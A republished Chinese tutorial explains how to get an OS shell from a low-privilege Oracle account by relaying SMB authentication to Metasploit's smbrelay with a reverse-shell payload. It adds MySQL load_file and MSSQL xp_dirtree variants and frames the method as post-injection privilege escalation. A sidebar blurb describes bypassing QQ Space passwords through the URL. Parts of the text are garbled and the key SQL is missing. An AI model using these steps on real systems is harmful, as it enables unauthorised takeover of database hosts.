Oracle 低权限数据库账户得到 OS 访问权限 提权利用

2016-02-19 09:29 37 1 收藏

有了下面这个Oracle 低权限数据库账户得到 OS 访问权限 提权利用教程,不懂Oracle 低权限数据库账户得到 OS 访问权限 提权利用的也能装懂了,赶紧get起来装逼一下吧!

【 tulaoshi.com - 编程语言 】

这几天看了篇叫"Penetration: from application down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问权限。我本地测试了下,还真的成功了。:-)

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/bianchengyuyan/)

具体的原理分析看原文吧,我这里把我的测试过程写出来.

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/bianchengyuyan/)

我的渗透环境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 数据库版本为 10.2.0.1.0,服务启动权限为 administrator,数据库账户用的是 dbsnmp 账户的默认权限.0

1.先用 netstat 命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭方法是 sudo /etc/init.d/samba stopp1

2.运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了.

2

3

3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,只有 connect和 resource 权限。

4.然后执行下面 3 条 SQL 语句

 

5

6

7

后来经过 pt007 的提醒,我又测试了 mysql,如果服务也是 administrator 启动的,用select load_file('\192.168.1.52mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。

这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。

两个PDF下载,

作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。

来源:http://www.tulaoshi.com/n/20160219/1591025.html

延伸阅读
Oracle数据库数据对象中最基本的是表和视图,其他还有约束、序列、函数、存储过程、包、触发器等。对数据库的操作可以基本归结为对数据对象的操作,理解和掌握Oracle数据库对象是学习Oracle的捷径。 表和视图 Oracle中表是数据存储的基本结构。ORACLE8引入了分区表和对象表,ORACLE...
这是我前段时间学数据库时做的一个小程序,采用DAO访问ACCESS数据库,程序的主界面如下,控制相对来说很是简单,实现了数据库的基本操作。如图一所示: 几点说明: 在程序中使用了CButtonStyle这个免费类库,它可以实现带位图的按位,这里是以加载图标的方式操作的,在InitButtonSytle()中,为了使代码更短小,用循环实现了图...
      每个数据库管理员都会面临数据导入的问题,这有可能发生在数据库的新老移植过程中,或者是在数据库崩溃后的恢复重建过程中,还有可能是在创建测试数据库的模拟环境过程中,总之作为一名合格的数据库管理员,你应该做好接受各种数据导入请求的技术储备,同时还要尽量满足人本能的对导入速度的苛求。本文仅针对 O...
标签: qq空间 qq
两个QQ 要有有两个QQ号码,这样方便对下面的步骤进行操作。 进入空间 想进入加密qq空间,可以把我们的第一个QQ号码的空间加上密码。后在用第二个QQ号码访问第一个QQ号码的加密空间。 输入密码 输入密码进入加密的QQ空间后。在地址栏里把QQ号码换成我们想进入空间但不知道密码的QQ号。回车就可以免密码轻松进入了。 ...
标签: ASP
  网上介绍用ASP访问INTERBASE数据库的资料很少,经过几天的奋斗终于成功的解决了这个问题.现把部份代码和一些资料贡献给大家. <%@ language="vbscript"%         str1 = "Driver={XTG Systems Interbase6 ODBC driver};uid=sysdba;pwd=masterkey;Data Source=ly" Set conn = Server.Creat...

经验教程

635

收藏

30
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部